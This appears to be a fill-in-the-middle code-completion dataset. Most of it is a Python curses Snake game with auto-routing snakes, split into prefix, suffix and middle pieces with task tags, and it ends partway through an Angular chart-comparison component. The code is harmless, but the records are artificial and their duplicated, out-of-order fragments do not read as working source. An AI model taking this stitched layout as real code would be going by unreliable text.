if len(self.tail) == level.width * level.height:
raise GameOver("You win!")
class AutoSnake(Snake):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.route = []
self.route_guard = None
async def get_directions(self, it):
async for c in it:
pass
def route_next(self):
if not self.route:
return
if self.route_guard and not self.route_guard():
return
self.next_dir = self.route.pop()
return True
def reroute(self):
# if self.wait > 1:
# target = Screen.FASTER
# else:
# target = Screen.FOOD
target = Screen.FOOD
res = self.route_to(target)
if res:
target_pos, self.route = res
def guard():
next_pos = level.wrap_pos(self.pos + self.route[-1])
return (level.get_tile(next_pos) in (target, Screen.BLANK) and
level.get_tile(target_pos) == target)
self.route_guard = target_pos and guard
else:
self.route = self.compress()
def guard():
next_pos = level.wrap_pos(self.pos + self.route[-1])
return not level.has_player(next_pos)
self.route_guard = guard
def compress(self):
p = self.pos
d = self.prev_dir
res = []
for i in range(min(10, len(self.tail) // 2)):
for r in (1j, 1, -1j):
t = level.wrap_pos(p + d*r)
if not level.has_player(t):
d = d * r
p += d
res.append(d)
break
else:
break
res.reverse()
return res or [0]
def route_to(self, target):
parent = {self.pos: None}
def backtrack(p):
res = []
while parent[p]:
d, p = parent[p]
res.append(d)
return res
n = [self.pos]
i = 0
while i < len(n):
p = n[i]
i += 1
v = level.get_tile(p)
if v == target:
return p, backtrack(p)
elif v != Screen.BLANK and p != self.pos:
continue
for dir in (0-1j, -1+0j, 0+1j, 1+0j):
q = level.wrap_pos(p + dir)
if q not in parent:
parent[q] = (dir, p)
n.append(q)
def step(self):
if not self.route_next():
self.reroute()
self.route_next()
super().step()
# width = 160
# height = 90
# width, height = 30, 20
# width, height = 15, 15
# width, height = 160, 90
def food_loop():
return level.food_loop_base(Screen.FOOD, lambda p: p.on_eat_food())
def faster_loop():
return level.food_loop_base(Screen.FASTER, lambda p: p.faster())
def slower_loop():
return level.food_loop_base(Screen.SLOWER, lambda p: p.slower())
# input = LockstepConsumers()
snakes = [
AutoSnake(speed=4, pos=0+10j),
AutoSnake(speed=4, pos=10+12j),
# AutoSnake(speed=4, pos=15+12j),
# AutoSnake(speed=4, pos=0+16j),
]
tasks = [
# input.consume(CursesCharacters(stdscr)),
food_loop(),
# food_loop(),
# food_loop(),
# food_loop(),
# food_loop(),
# faster_loop(),
# slower_loop(),
level.play(snakes),
]
# for s in snakes:
# tasks.append(
# s.get_directions(input.consumer()))
try:
msg = str(run_coroutines(tasks))
except GameOver as exn:
msg = exn.args[0]
except KeyboardInterrupt:
raise
msg = 'Thanks for playing!'
raise SystemExit('\n'.join(
[str(msg),
# "You ate %s foods" % (len(the_snake.tail) - INITIAL_LENGTH),
# "You moved %s tiles" % the_snake.steps,
"Good job!!"]))
if __name__ == "__main__":
wrapper(main)
| t = 0
n = [0] * len(snakes)
while True:
i = min(range(len(snakes)), key=lambda i: n[i])
if n[i] > t:
self.screen.refresh()
await asyncio.sleep(0.01 * (n[i] - t))
t = n[i]
try:
snakes[i].step()
except GameOver:
for c in snakes[i].tail:
self.screen.addch(c, Screen.BLANK)
# s = max(1, snakes[i].wait-1)
del snakes[i]
if not snakes:
raise
# pos = self.random_free_position()
# snakes.append(AutoSnake(speed=s, pos=pos, length=1))
continue
w = max(1, math.ceil(math.log(len(snakes[i].tail), 2)))
n[i] += w | identifier_body |
pysnake.py | import math
import curses
import random
import asyncio
# from asyncsnake import LockstepConsumers
from asyncsnake import run_coroutines, WaitMap
# from cursessnake import CursesCharacters
from cursessnake import wrapper
class GameOver(Exception):
pass
UP = 0-1j
RIGHT = 1+0j
DOWN = 0+1j
LEFT = -1+0j
INITIAL_LENGTH = 6
class ScreenBase:
COLORS = None
BLANK = ' '
def __init__(self, stdscr):
self.board = {}
self.stdscr = stdscr
self.stdscr.nodelay(1)
curses.curs_set(0)
self._color_id = {k: i
for i, k in enumerate(self.COLORS.keys(), 1)}
for k, c in self.COLORS.items():
curses.init_pair(self._color_id[k], c, curses.COLOR_BLACK)
def addch(self, pos, ch):
i = int(pos.imag)
j = int(pos.real)
self.board[i, j] = ch
self._update(i // 2, j)
assert self.gettile(pos) == ch
def gettile(self, pos):
i = int(pos.imag)
j = int(pos.real)
return self.board.get((i, j), self.BLANK)
def delch(self, pos, ch):
if self.gettile(pos) == ch:
self.addch(pos, self.BLANK)
def _update(self, row, col):
ch1 = self.board.get((2*row, col), self.BLANK)
ch2 = self.board.get((2*row+1, col), self.BLANK)
if ch1 != self.BLANK and ch2 != self.BLANK:
c = '\N{FULL BLOCK}'
elif ch1 != self.BLANK:
c = '\N{UPPER HALF BLOCK}'
elif ch2 != self.BLANK:
c = '\N{LOWER HALF BLOCK}'
else:
c = self.BLANK
color = next(
(i for ch, i in self._color_id.items() if ch in (ch1, ch2)),
0)
self.stdscr.addstr(row, col, c, curses.color_pair(color))
def refresh(self):
self.stdscr.refresh()
class Screen(ScreenBase):
BODY = 'X'
FOOD = 'o'
FASTER = '+'
SLOWER = '-'
COLORS = {BODY: curses.COLOR_BLUE,
FOOD: curses.COLOR_YELLOW,
FASTER: curses.COLOR_GREEN,
SLOWER: curses.COLOR_RED}
class Level:
def __init__(self, stdscr, width=30, height=20):
self.screen = Screen(stdscr)
self.waiters = WaitMap()
self.width, self.height = width, height
self.worm_holes = {
self.random_position(): self.random_position()
for _ in range(3)}
def random_position(self):
return complex(random.randint(0, self.width-1),
random.randint(0, self.height-1))
def is_free(self, pos):
return self.get_tile(pos) == self.screen.BLANK
def random_free_position(self):
p = self.random_position()
while not self.is_free(p):
p = self.random_position()
return p
def random_rect(self, w, h):
max_i = self.height - (h-1)
max_j = self.width - (w-1)
return complex(random.randint(0, max_j-1),
random.randint(0, max_i//2-1)*2)
def free_rect(self, pos, w, h):
return all(self.is_free(pos + i*1j + j)
for i in range(h)
for j in range(w))
def random_free_rect(self, w, h):
pos = self.random_rect(w, h)
while not self.free_rect(pos, w, h):
pos = self.random_rect(w, h)
return pos
def add_rect(self, pos, ch, w, h):
for i in range(h):
for j in range(w):
self.screen.addch(pos + i + j*1j, ch)
def del_rect(self, pos, ch, w, h):
for i in range(h):
for j in range(w):
self.screen.delch(pos + i + j*1j, ch)
async def food_loop_base(self, ch, fn, w=2, h=2):
while True:
pos = self.random_free_rect(w, h)
self.add_rect(pos, ch, w, h)
self.screen.refresh()
p = await self.wait_for_player_rect(pos, w, h)
self.del_rect(pos, ch, w, h)
fn(p)
def put_player(self, snake, pos):
self.screen.addch(pos, self.screen.BODY)
self.waiters.notify(pos, snake)
def clear_player(self, pos):
self.screen.addch(pos, self.screen.BLANK)
def has_player(self, pos):
return self.get_tile(pos) == self.screen.BODY
def get_tile(self, pos):
return self.screen.gettile(pos)
async def wait_for_player_rect(self, pos, w, h):
futures = [self.waiters.wait(pos + i*1j + j)
for i in range(h)
for j in range(w)]
wait = asyncio.wait(futures, return_when=asyncio.FIRST_COMPLETED)
dones, pending = await wait
for f in pending:
f.cancel()
results = []
for done in dones:
results.append(await done)
return results[0]
def wrap_pos(self, pos):
pos = self.worm_holes.get(pos, pos)
return complex(pos.real % self.width, pos.imag % self.height)
async def play(self, snakes):
t = 0
n = [0] * len(snakes)
while True:
i = min(range(len(snakes)), key=lambda i: n[i])
if n[i] > t:
self.screen.refresh()
await asyncio.sleep(0.01 * (n[i] - t))
t = n[i]
try:
snakes[i].step()
except GameOver:
for c in snakes[i].tail:
self.screen.addch(c, Screen.BLANK)
# s = max(1, snakes[i].wait-1)
del snakes[i]
if not snakes:
raise
# pos = self.random_free_position()
# snakes.append(AutoSnake(speed=s, pos=pos, length=1))
continue
w = max(1, math.ceil(math.log(len(snakes[i].tail), 2)))
n[i] += w
def main(stdscr):
level = Level(stdscr)
class Snake:
def __init__(self, pos=None, dir=None, controls=None, speed=None, length=None):
self.wait = speed or 10
if pos is None:
self.pos = 0+0j
else:
self.pos = pos
if dir is None:
self.prev_dir = self.next_dir = RIGHT
else:
self.prev_dir = self.next_dir = dir
self.steps = 0
self.tail = [self.pos] * (length or INITIAL_LENGTH)
self.tail_index = 0
if controls is None:
controls = [curses.KEY_UP,
curses.KEY_LEFT,
curses.KEY_DOWN,
curses.KEY_RIGHT]
else:
controls = [ord(c) if isinstance(c, str)
else c for c in controls]
self.controls = controls
async def get_directions(self, it):
async for c in it:
try:
i = self.controls.index(c)
except ValueError:
continue
next_dir = [0-1j, -1+0j, 0+1j, 1+0j][i]
if next_dir == -self.prev_dir:
self.next_dir = 0
else:
self.next_dir = next_dir
def step(self):
if self.next_dir == 0:
return
level.clear_player(self.tail[self.tail_index])
self.pos = level.wrap_pos(self.pos + self.next_dir)
self.prev_dir = self.next_dir
if level.has_player(self.pos):
raise GameOver("Boom! You hit yourself")
self.tail[self.tail_index] = self.pos
level.put_player(self, self.pos)
self.tail_index += 1
self.steps += 1
if self.tail_index == len(self.tail):
self.tail_index = 0
def slower(self):
self.wait = self.wait + 1
def faster(self):
self.wait = max(1, self.wait - 1)
def on_eat_food(self):
self.tail.insert(self.tail_index, self.tail[self.tail_index])
if len(self.tail) == level.width * level.height:
raise GameOver("You win!")
class AutoSnake(Snake):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.route = []
self.route_guard = None
async def get_directions(self, it):
async for c in it:
pass
def route_next(self):
if not self.route:
return
if self.route_guard and not self.route_guard():
return
self.next_dir = self.route.pop()
return True
def reroute(self):
# if self.wait > 1:
# target = Screen.FASTER
# else:
# target = Screen.FOOD
target = Screen.FOOD
res = self.route_to(target)
if res:
target_pos, self.route = res
def guard():
next_pos = level.wrap_pos(self.pos + self.route[-1])
return (level.get_tile(next_pos) in (target, Screen.BLANK) and
level.get_tile(target_pos) == target)
self.route_guard = target_pos and guard
else:
self.route = self.compress()
def guard():
next_pos = level.wrap_pos(self.pos + self.route[-1])
return not level.has_player(next_pos)
self.route_guard = guard
def compress(self):
p = self.pos
d = self.prev_dir
res = []
for i in range(min(10, len(self.tail) // 2)):
for r in (1j, 1, -1j):
t = level.wrap_pos(p + d*r)
if not level.has_player(t):
d = d * r
p += d
res.append(d)
break
else:
break
res.reverse()
return res or [0]
def route_to(self, target):
parent = {self.pos: None}
def backtrack(p):
res = []
while parent[p]:
d, p = parent[p]
res.append(d)
return res
n = [self.pos]
i = 0
while i < len(n):
p = n[i]
i += 1
v = level.get_tile(p)
if v == target:
return p, backtrack(p)
elif v != Screen.BLANK and p != self.pos:
continue
for dir in (0-1j, -1+0j, 0+1j, 1+0j):
q = level.wrap_pos(p + dir)
if q not in parent:
parent[q] = (dir, p)
n.append(q)
def step(self):
if not self.route_next():
self.reroute()
self.route_next()
super().step()
# width = 160
# height = 90
# width, height = 30, 20
# width, height = 15, 15
# width, height = 160, 90
def food_loop():
return level.food_loop_base(Screen.FOOD, lambda p: p.on_eat_food())
def faster_loop():
return level.food_loop_base(Screen.FASTER, lambda p: p.faster())
def slower_loop():
return level.food_loop_base(Screen.SLOWER, lambda p: p.slower())
# input = LockstepConsumers()
snakes = [
AutoSnake(speed=4, pos=0+10j),
AutoSnake(speed=4, pos=10+12j),
# AutoSnake(speed=4, pos=15+12j),
# AutoSnake(speed=4, pos=0+16j),
]
tasks = [
# input.consume(CursesCharacters(stdscr)),
food_loop(),
# food_loop(),
# food_loop(),
# food_loop(),
# food_loop(),
# faster_loop(),
# slower_loop(),
level.play(snakes),
]
# for s in snakes:
# tasks.append(
# s.get_directions(input.consumer()))
try:
msg = str(run_coroutines(tasks))
except GameOver as exn:
msg = exn.args[0]
except KeyboardInterrupt:
raise | raise SystemExit('\n'.join(
[str(msg),
# "You ate %s foods" % (len(the_snake.tail) - INITIAL_LENGTH),
# "You moved %s tiles" % the_snake.steps,
"Good job!!"]))
if __name__ == "__main__":
wrapper(main) | msg = 'Thanks for playing!'
| random_line_split |
pysnake.py | import math
import curses
import random
import asyncio
# from asyncsnake import LockstepConsumers
from asyncsnake import run_coroutines, WaitMap
# from cursessnake import CursesCharacters
from cursessnake import wrapper
class GameOver(Exception):
pass
UP = 0-1j
RIGHT = 1+0j
DOWN = 0+1j
LEFT = -1+0j
INITIAL_LENGTH = 6
class ScreenBase:
COLORS = None
BLANK = ' '
def __init__(self, stdscr):
self.board = {}
self.stdscr = stdscr
self.stdscr.nodelay(1)
curses.curs_set(0)
self._color_id = {k: i
for i, k in enumerate(self.COLORS.keys(), 1)}
for k, c in self.COLORS.items():
curses.init_pair(self._color_id[k], c, curses.COLOR_BLACK)
def addch(self, pos, ch):
i = int(pos.imag)
j = int(pos.real)
self.board[i, j] = ch
self._update(i // 2, j)
assert self.gettile(pos) == ch
def gettile(self, pos):
i = int(pos.imag)
j = int(pos.real)
return self.board.get((i, j), self.BLANK)
def delch(self, pos, ch):
if self.gettile(pos) == ch:
self.addch(pos, self.BLANK)
def _update(self, row, col):
ch1 = self.board.get((2*row, col), self.BLANK)
ch2 = self.board.get((2*row+1, col), self.BLANK)
if ch1 != self.BLANK and ch2 != self.BLANK:
c = '\N{FULL BLOCK}'
elif ch1 != self.BLANK:
c = '\N{UPPER HALF BLOCK}'
elif ch2 != self.BLANK:
c = '\N{LOWER HALF BLOCK}'
else:
c = self.BLANK
color = next(
(i for ch, i in self._color_id.items() if ch in (ch1, ch2)),
0)
self.stdscr.addstr(row, col, c, curses.color_pair(color))
def refresh(self):
self.stdscr.refresh()
class Screen(ScreenBase):
BODY = 'X'
FOOD = 'o'
FASTER = '+'
SLOWER = '-'
COLORS = {BODY: curses.COLOR_BLUE,
FOOD: curses.COLOR_YELLOW,
FASTER: curses.COLOR_GREEN,
SLOWER: curses.COLOR_RED}
class Level:
def __init__(self, stdscr, width=30, height=20):
self.screen = Screen(stdscr)
self.waiters = WaitMap()
self.width, self.height = width, height
self.worm_holes = {
self.random_position(): self.random_position()
for _ in range(3)}
def random_position(self):
return complex(random.randint(0, self.width-1),
random.randint(0, self.height-1))
def is_free(self, pos):
return self.get_tile(pos) == self.screen.BLANK
def random_free_position(self):
p = self.random_position()
while not self.is_free(p):
p = self.random_position()
return p
def random_rect(self, w, h):
max_i = self.height - (h-1)
max_j = self.width - (w-1)
return complex(random.randint(0, max_j-1),
random.randint(0, max_i//2-1)*2)
def free_rect(self, pos, w, h):
return all(self.is_free(pos + i*1j + j)
for i in range(h)
for j in range(w))
def random_free_rect(self, w, h):
pos = self.random_rect(w, h)
while not self.free_rect(pos, w, h):
pos = self.random_rect(w, h)
return pos
def add_rect(self, pos, ch, w, h):
for i in range(h):
for j in range(w):
self.screen.addch(pos + i + j*1j, ch)
def del_rect(self, pos, ch, w, h):
for i in range(h):
for j in range(w):
self.screen.delch(pos + i + j*1j, ch)
async def food_loop_base(self, ch, fn, w=2, h=2):
while True:
pos = self.random_free_rect(w, h)
self.add_rect(pos, ch, w, h)
self.screen.refresh()
p = await self.wait_for_player_rect(pos, w, h)
self.del_rect(pos, ch, w, h)
fn(p)
def put_player(self, snake, pos):
self.screen.addch(pos, self.screen.BODY)
self.waiters.notify(pos, snake)
def clear_player(self, pos):
self.screen.addch(pos, self.screen.BLANK)
def has_player(self, pos):
return self.get_tile(pos) == self.screen.BODY
def get_tile(self, pos):
return self.screen.gettile(pos)
async def wait_for_player_rect(self, pos, w, h):
futures = [self.waiters.wait(pos + i*1j + j)
for i in range(h)
for j in range(w)]
wait = asyncio.wait(futures, return_when=asyncio.FIRST_COMPLETED)
dones, pending = await wait
for f in pending:
f.cancel()
results = []
for done in dones:
results.append(await done)
return results[0]
def | (self, pos):
pos = self.worm_holes.get(pos, pos)
return complex(pos.real % self.width, pos.imag % self.height)
async def play(self, snakes):
t = 0
n = [0] * len(snakes)
while True:
i = min(range(len(snakes)), key=lambda i: n[i])
if n[i] > t:
self.screen.refresh()
await asyncio.sleep(0.01 * (n[i] - t))
t = n[i]
try:
snakes[i].step()
except GameOver:
for c in snakes[i].tail:
self.screen.addch(c, Screen.BLANK)
# s = max(1, snakes[i].wait-1)
del snakes[i]
if not snakes:
raise
# pos = self.random_free_position()
# snakes.append(AutoSnake(speed=s, pos=pos, length=1))
continue
w = max(1, math.ceil(math.log(len(snakes[i].tail), 2)))
n[i] += w
def main(stdscr):
level = Level(stdscr)
class Snake:
def __init__(self, pos=None, dir=None, controls=None, speed=None, length=None):
self.wait = speed or 10
if pos is None:
self.pos = 0+0j
else:
self.pos = pos
if dir is None:
self.prev_dir = self.next_dir = RIGHT
else:
self.prev_dir = self.next_dir = dir
self.steps = 0
self.tail = [self.pos] * (length or INITIAL_LENGTH)
self.tail_index = 0
if controls is None:
controls = [curses.KEY_UP,
curses.KEY_LEFT,
curses.KEY_DOWN,
curses.KEY_RIGHT]
else:
controls = [ord(c) if isinstance(c, str)
else c for c in controls]
self.controls = controls
async def get_directions(self, it):
async for c in it:
try:
i = self.controls.index(c)
except ValueError:
continue
next_dir = [0-1j, -1+0j, 0+1j, 1+0j][i]
if next_dir == -self.prev_dir:
self.next_dir = 0
else:
self.next_dir = next_dir
def step(self):
if self.next_dir == 0:
return
level.clear_player(self.tail[self.tail_index])
self.pos = level.wrap_pos(self.pos + self.next_dir)
self.prev_dir = self.next_dir
if level.has_player(self.pos):
raise GameOver("Boom! You hit yourself")
self.tail[self.tail_index] = self.pos
level.put_player(self, self.pos)
self.tail_index += 1
self.steps += 1
if self.tail_index == len(self.tail):
self.tail_index = 0
def slower(self):
self.wait = self.wait + 1
def faster(self):
self.wait = max(1, self.wait - 1)
def on_eat_food(self):
self.tail.insert(self.tail_index, self.tail[self.tail_index])
if len(self.tail) == level.width * level.height:
raise GameOver("You win!")
class AutoSnake(Snake):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.route = []
self.route_guard = None
async def get_directions(self, it):
async for c in it:
pass
def route_next(self):
if not self.route:
return
if self.route_guard and not self.route_guard():
return
self.next_dir = self.route.pop()
return True
def reroute(self):
# if self.wait > 1:
# target = Screen.FASTER
# else:
# target = Screen.FOOD
target = Screen.FOOD
res = self.route_to(target)
if res:
target_pos, self.route = res
def guard():
next_pos = level.wrap_pos(self.pos + self.route[-1])
return (level.get_tile(next_pos) in (target, Screen.BLANK) and
level.get_tile(target_pos) == target)
self.route_guard = target_pos and guard
else:
self.route = self.compress()
def guard():
next_pos = level.wrap_pos(self.pos + self.route[-1])
return not level.has_player(next_pos)
self.route_guard = guard
def compress(self):
p = self.pos
d = self.prev_dir
res = []
for i in range(min(10, len(self.tail) // 2)):
for r in (1j, 1, -1j):
t = level.wrap_pos(p + d*r)
if not level.has_player(t):
d = d * r
p += d
res.append(d)
break
else:
break
res.reverse()
return res or [0]
def route_to(self, target):
parent = {self.pos: None}
def backtrack(p):
res = []
while parent[p]:
d, p = parent[p]
res.append(d)
return res
n = [self.pos]
i = 0
while i < len(n):
p = n[i]
i += 1
v = level.get_tile(p)
if v == target:
return p, backtrack(p)
elif v != Screen.BLANK and p != self.pos:
continue
for dir in (0-1j, -1+0j, 0+1j, 1+0j):
q = level.wrap_pos(p + dir)
if q not in parent:
parent[q] = (dir, p)
n.append(q)
def step(self):
if not self.route_next():
self.reroute()
self.route_next()
super().step()
# width = 160
# height = 90
# width, height = 30, 20
# width, height = 15, 15
# width, height = 160, 90
def food_loop():
return level.food_loop_base(Screen.FOOD, lambda p: p.on_eat_food())
def faster_loop():
return level.food_loop_base(Screen.FASTER, lambda p: p.faster())
def slower_loop():
return level.food_loop_base(Screen.SLOWER, lambda p: p.slower())
# input = LockstepConsumers()
snakes = [
AutoSnake(speed=4, pos=0+10j),
AutoSnake(speed=4, pos=10+12j),
# AutoSnake(speed=4, pos=15+12j),
# AutoSnake(speed=4, pos=0+16j),
]
tasks = [
# input.consume(CursesCharacters(stdscr)),
food_loop(),
# food_loop(),
# food_loop(),
# food_loop(),
# food_loop(),
# faster_loop(),
# slower_loop(),
level.play(snakes),
]
# for s in snakes:
# tasks.append(
# s.get_directions(input.consumer()))
try:
msg = str(run_coroutines(tasks))
except GameOver as exn:
msg = exn.args[0]
except KeyboardInterrupt:
raise
msg = 'Thanks for playing!'
raise SystemExit('\n'.join(
[str(msg),
# "You ate %s foods" % (len(the_snake.tail) - INITIAL_LENGTH),
# "You moved %s tiles" % the_snake.steps,
"Good job!!"]))
if __name__ == "__main__":
wrapper(main)
| wrap_pos | identifier_name |
graph-with-comparison-new.component.ts | import {
AfterContentInit,
ChangeDetectionStrategy,
ChangeDetectorRef,
Component,
ElementRef,
Input,
ViewChild,
} from '@angular/core';
import { AbstractSubscriptionStoreComponent } from '@components/abstract-subscription-store.component';
import { AppUiStoreFacadeService } from '@legacy-import/src/lib/js/services/ui-store/app-ui-store-facade.service';
import { ChartData, ChartOptions, TooltipItem } from 'chart.js';
import { BehaviorSubject, combineLatest, filter, Observable, share, takeUntil } from 'rxjs';
import { NumericTurnInfo } from '../../models/battlegrounds/post-match/numeric-turn-info';
@Component({
selector: 'graph-with-comparison-new',
styleUrls: [`../../../css/component/battlegrounds/graph-with-comparison.component.scss`],
template: `
<ng-container
*ngIf="{ lineChartData: lineChartData$ | async, lineChartOptions: lineChartOptions$ | async } as value"
>
<div class="legend">
<div class="item average" [helpTooltip]="communityTooltip">
<div class="node"></div>
{{ communityLabel$ | async }}
</div>
<div
class="item current"
[helpTooltip]="yourTooltip"
*ngIf="value.lineChartData?.datasets[1]?.data?.length"
>
<div class="node"></div>
{{ yourLabel$ | async }}
</div>
</div>
<div class="container-1">
<div style="display: block; position: relative; height: 100%; width: 100%;">
<canvas
*ngIf="value.lineChartData?.datasets[0]?.data?.length"
#chart
baseChart
[data]="value.lineChartData"
[options]="value.lineChartOptions"
[legend]="false"
[type]="'line'"
></canvas>
</div>
</div>
</ng-container>
`,
changeDetection: ChangeDetectionStrategy.OnPush,
})
export class GraphWithComparisonNewComponent extends AbstractSubscriptionStoreComponent implements AfterContentInit {
@ViewChild('chart', { static: false }) chart: ElementRef;
lineChartData$: Observable<ChartData<'line'>>;
lineChartOptions$: Observable<ChartOptions>;
communityLabel$: Observable<string>;
yourLabel$: Observable<string>;
@Input() communityTooltip: string;
@Input() yourTooltip: string;
@Input() turnLabel = 'Turn';
@Input() statLabel = 'Stat';
@Input() deltaLabel: string;
@Input() id: string;
@Input() showDeltaWithPrevious: boolean;
@Input() set maxYValue(value: number) {
this.maxYValue$$.next(value);
}
@Input() set stepSize(value: number) {
this.stepSize$$.next(value);
}
@Input() set showYAxis(value: boolean) {
this.showYAxis$$.next(value);
}
@Input() set communityLabel(value: string) {
this.communityLabel$$.next(value);
}
@Input() set yourLabel(value: string) {
this.yourLabel$$.next(value);
}
@Input() set communityValues(value: readonly NumericTurnInfo[]) {
this.communityValues$$.next(value);
}
@Input() set | (value: readonly NumericTurnInfo[]) {
this.yourValues$$.next(value);
}
private maxYValue$$ = new BehaviorSubject<number>(null);
private stepSize$$ = new BehaviorSubject<number>(null);
private showYAxis$$ = new BehaviorSubject<boolean>(true);
private communityLabel$$ = new BehaviorSubject<string>('Community');
private yourLabel$$ = new BehaviorSubject<string>('You');
private communityValues$$ = new BehaviorSubject<readonly NumericTurnInfo[]>(null);
private yourValues$$ = new BehaviorSubject<readonly NumericTurnInfo[]>(null);
constructor(
protected readonly store: AppUiStoreFacadeService,
protected readonly cdr: ChangeDetectorRef,
private readonly el: ElementRef,
) {
super(store, cdr);
}
ngAfterContentInit(): void {
this.communityLabel$ = this.communityLabel$$.pipe(this.mapData((info) => info));
this.yourLabel$ = this.yourLabel$$.pipe(this.mapData((info) => info));
this.lineChartData$ = combineLatest([
this.communityLabel$$.asObservable(),
this.yourLabel$$.asObservable(),
this.communityValues$$.asObservable(),
this.yourValues$$.asObservable(),
]).pipe(
this.mapData(([communityLabel, yourLabel, communityValues, yourValues]) => {
// Turn 0 is before any battle, so it's not really interesting for us
const community = this.removeTurnZero(communityValues || []);
const your = this.removeTurnZero(yourValues || []);
const maxTurnFromCommunity = this.getMaxTurn(community);
const maxTurnFromYour = this.getMaxTurn(your);
const lastTurn = Math.max(maxTurnFromCommunity, maxTurnFromYour);
const filledCommunity = this.fillMissingData(community, lastTurn);
const filledYour = this.fillMissingData(your, lastTurn);
// console.debug('chart data', filledCommunity, filledYour, lastTurn, community, your);
const yourData = filledYour?.map((stat) => stat.value) || [];
const communityData = filledCommunity?.map((stat) => stat.value) || [];
// TODO: missing color
const newChartData: ChartData<'line'>['datasets'] = [
{
id: 'your',
data: yourData,
label: yourLabel,
backgroundColor: 'transparent',
borderColor: '#FFB948',
delta: yourData?.length
? [
yourData[0],
...yourData.slice(1).map((n, i) => (yourData[i] == null ? null : n - yourData[i])),
]
: [],
} as any,
{
id: 'community',
data: communityData,
label: communityLabel,
backgroundColor: 'transparent',
borderColor: '#CE73B4',
delta: communityData?.length
? [
communityData[0],
...communityData
.slice(1)
.map((n, i) => (communityData[i] == null ? null : n - communityData[i])),
]
: [],
} as any,
];
const result = {
datasets: newChartData,
labels: [...Array(lastTurn + 1).keys()].filter((turn) => turn > 0).map((turn) => '' + turn),
};
return result;
}),
share(),
takeUntil(this.destroyed$),
);
const maxValue$ = combineLatest([this.maxYValue$$.asObservable(), this.lineChartData$]).pipe(
filter(([maxValue, chartData]) => !!chartData),
this.mapData(([maxYValue, chartData]) => {
const maxValue = Math.max(
...chartData.datasets.map((data) => data.data as number[]).reduce((a, b) => a.concat(b), []),
);
return !!maxYValue ? Math.max(maxYValue, maxValue) : undefined;
}),
);
this.lineChartOptions$ = combineLatest([
maxValue$,
this.stepSize$$.asObservable(),
this.showYAxis$$.asObservable(),
]).pipe(
this.mapData(([maxValue, stepSize, showYAxis]) => this.buildChartOptions(showYAxis, stepSize, maxValue)),
);
}
private removeTurnZero(input: readonly NumericTurnInfo[]): readonly NumericTurnInfo[] {
return input.filter((stat) => stat.turn > 0);
}
private fillMissingData(input: readonly NumericTurnInfo[], lastTurn: number) {
const result = [];
for (let i = 1; i <= lastTurn; i++) {
result.push(
input.find((stat) => stat.turn === i) || {
turn: i,
value: null,
},
);
}
return result;
}
private getMaxTurn(input: readonly NumericTurnInfo[]) {
return input.filter((stat) => stat.value != null).length === 0
? 0
: Math.max(...input.filter((stat) => stat.value != null).map((stat) => stat.turn));
}
private buildChartOptions(showYAxis: boolean, stepSize: number, maxYValue: number): ChartOptions {
const result: ChartOptions = {
responsive: true,
maintainAspectRatio: false,
layout: {
padding: 0,
},
elements: {
point: {
radius: 0,
},
},
plugins: {
datalabels: {
display: false,
},
tooltip: {
enabled: false,
mode: 'index',
intersect: false,
position: 'nearest',
backgroundColor: '#CE73B4',
titleColor: '#40032E',
titleFont: {
family: 'Open Sans',
},
bodyColor: '#40032E',
bodyFont: {
family: 'Open Sans',
},
padding: 5,
caretPadding: 2,
caretSize: 10,
cornerRadius: 0,
displayColors: false,
callbacks: {
beforeBody: (items: TooltipItem<'line'>[]): string | string[] => {
return items?.map(
(item: any) =>
((item?.dataset as any)?.id ?? '') +
'|||' +
(item?.dataset?.label ?? '') +
'|||' +
item?.dataset?.delta[item.dataIndex],
);
},
},
external: (context) => {
const tooltipId = 'chartjs-tooltip-stats-' + this.id;
const chartParent = this.chart.nativeElement.parentNode;
let tooltipEl = document.getElementById(tooltipId);
if (!tooltipEl) {
tooltipEl = document.createElement('div');
tooltipEl.id = tooltipId;
tooltipEl.classList.add('tooltip-container');
tooltipEl.innerHTML = `
<div class="stats-tooltip">
<svg class="tooltip-arrow" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 16 9">
<polygon points="0,0 8,-9 16,0"/>
</svg>
<div class="content"></div>
</div>`;
chartParent.appendChild(tooltipEl);
}
// Hide if no tooltip
const tooltip = context.tooltip;
if (tooltip.opacity === 0) {
tooltipEl.style.opacity = '0';
return;
}
const yourDatapoint = tooltip.dataPoints.find((dataset) => dataset.datasetIndex === 0);
const communityDatapoint = tooltip.dataPoints.find((dataset) => dataset.datasetIndex === 1);
let yourLabel: string = null;
let yourDelta: string = null;
let communityLabel: string = null;
let communityDelta: string = null;
for (const bBody of tooltip.beforeBody) {
const [id, label, delta] = bBody.split('|||');
if (id === 'your') {
yourLabel = label;
yourDelta = delta;
} else {
communityLabel = label;
communityDelta = delta;
}
}
// console.debug(
// 'labels',
// yourLabel,
// communityLabel,
// tooltip.beforeBody,
// yourDatapoint,
// communityDatapoint,
// );
const playerSection = yourDatapoint?.formattedValue
? this.buildSection(
'player',
yourLabel,
this.turnLabel,
this.statLabel,
this.deltaLabel,
yourDelta != null ? parseInt(yourDelta) : null,
yourDatapoint,
)
: '';
const communitySection = communityDatapoint?.formattedValue
? this.buildSection(
'average',
communityLabel,
this.turnLabel,
this.statLabel,
this.deltaLabel,
communityDelta != null ? parseInt(communityDelta) : null,
communityDatapoint,
)
: '';
const innerHtml = `
<div class="body">
${playerSection}
${communitySection}
</div>
`;
const tableRoot = tooltipEl.querySelector('.content');
tableRoot.innerHTML = innerHtml;
const tooltipWidth = tooltipEl.getBoundingClientRect().width;
const tooltipHeight = tooltipEl.getBoundingClientRect().height;
const leftOffset = yourDatapoint?.parsed != null ? 0 : 50;
const tooltipLeft = Math.max(
0,
Math.min(
tooltip.caretX - tooltipWidth / 2 + leftOffset,
chartParent.getBoundingClientRect().right - tooltipWidth,
),
);
// caret should always be positioned on the initial tooltip.caretX. However, since the
// position is relative to the tooltip element, we need to do some gymnastic :)
// 10 is because of padding
const tooltipArrowEl: any = tooltipEl.querySelector('.tooltip-arrow');
const carretLeft = tooltip.caretX - tooltipLeft - 8;
tooltipArrowEl.style.left = carretLeft + 'px';
// Display, position, and set styles for font
// Make sure the bottom doesn't go outside of the graph
let tooltipTop = tooltip.y - tooltipHeight;
const chartHeight = tooltip.chart.canvas.offsetHeight;
if (tooltipTop + tooltipHeight > chartHeight) {
tooltipTop = chartHeight - tooltipHeight - 25;
}
if (tooltipTop < 0) {
tooltipTop = 0;
}
